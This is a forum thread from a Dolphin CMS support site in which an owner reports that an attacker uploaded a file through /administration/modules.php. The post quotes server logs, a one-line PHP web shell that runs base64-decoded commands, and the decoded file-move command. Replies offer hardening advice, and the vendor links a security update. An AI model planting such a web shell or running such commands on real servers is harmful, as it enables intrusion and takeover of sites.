Hacking via administration/modules.php

One of my websites was down this morning and i was able to find the reason, someone edited my /inc/admin.inc.php file and entered an ")" that produced a blank site because PHP throw an error on that.

I found two files in my /tmp folder, called a.php and admin.inc.php (which was the original, unmodified, one).

In the /administration folder there was a file called wa.php, which is a filemanager in one PHP file.

So, how was that possible?

After having a look at my server logs i saw that someone did a POST request to /administration/modules.php. Right after that he/she executes the a.php file in /tmp folder with an URL query.

 

[30/Oct/2016:20:47:03 +0000] "POST /administration/modules.php HTTP/1.0" 200 94709 "-" "-"
[30/Oct/2016:20:47:05 +0000] "GET /tmp/a.php?a=bXYgd2EucGhwIC4uL2FkbWluaXN0cmF0aW9uL3dhLnBocA== HTTP/1.0" 200 - "-" "-"

 

The content of the a.php file is something like "passthru(base64_decode($_GET['a']));"

After base64_decode the query parameter "a" is something like "mv wa.php ../administration/wa.php"

 

Now he/she was able to execute the wa.php file and change every file inside the Dolphin installation. Lucky me that he/she only changed the admin.inc.php file to bring my site down.

 

[30/Oct/2016:20:47:06 +0000] "GET /administration/wa.php HTTP/1.0" 200 89024 "-" "-"

 

Anyone has an idea why this person was able to upload the files to the /tmp folder and how we can prevent those guys from doing this again?

http://www.boonex.com/market/posts/paansystems - your resource for Dolphin Pro
Quote · 31 Oct 2016

AlexT? Andrew?

http://www.boonex.com/market/posts/paansystems - your resource for Dolphin Pro
Quote · 1 Nov 2016

I don't know, but when they (guess) know your password everything is possible.
I can't coding, so if somewhere is a leak, .... 

http://www.busimatch.club ( The most exclusive business club)
Quote · 1 Nov 2016

No, they had no password at all ...

http://www.boonex.com/market/posts/paansystems - your resource for Dolphin Pro
Quote · 1 Nov 2016

Interesting...

 

You should, also, not run your php-fpm/apache as the user with write permission on all these sites files :/

 

If you don't have any problem with sharing that log file, can you upload the whole log file somewhere, with the log for at least few hours around that request that's executing the script

If you can upload error log as well that would be nice.

 

EDIT: ok.... I have found part of the big issue, wondering where to report security issues...

so much to do....
Quote · 1 Nov 2016

And I reproduced the file uploading exploit/issue, it was a bit too easy Surprised

 

Off to deleting everyone dolphin sites Money Mouth

so much to do....
Quote · 1 Nov 2016

So this is an issue with Dolphin, right?

http://www.boonex.com/market/posts/paansystems - your resource for Dolphin Pro
Quote · 1 Nov 2016

 

So this is an issue with Dolphin, right?

yup

 

tho, it's no excuse for not configuring your server right, remember layered security (or something like that)... php should not be able to modify/write to your site's files in any condition. Lock 'em down and only allow write to folders which need them for file uploads ;)

 

EDIT: BTW, An advice for you, since it seems some guy is onto your site, you might wanna change your admin profile id to anything random from "1" as a temporary solution to throw this guy off. I have reported the exploits to uno@b....com already.

so much to do....
Quote · 1 Nov 2016

Thanks!

http://www.boonex.com/market/posts/paansystems - your resource for Dolphin Pro
Quote · 1 Nov 2016

https://www.boonex.com/trac/dolphin/wiki/7.3.2-7.3.3

Quote · 2 Nov 2016

Thank you @TruckingSpace for the link.

We've just released update with security fix.

File uploading problem isn't reproducible without another vulnerability, which was just fixed. 

Rules → http://www.boonex.com/terms
Quote · 2 Nov 2016
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.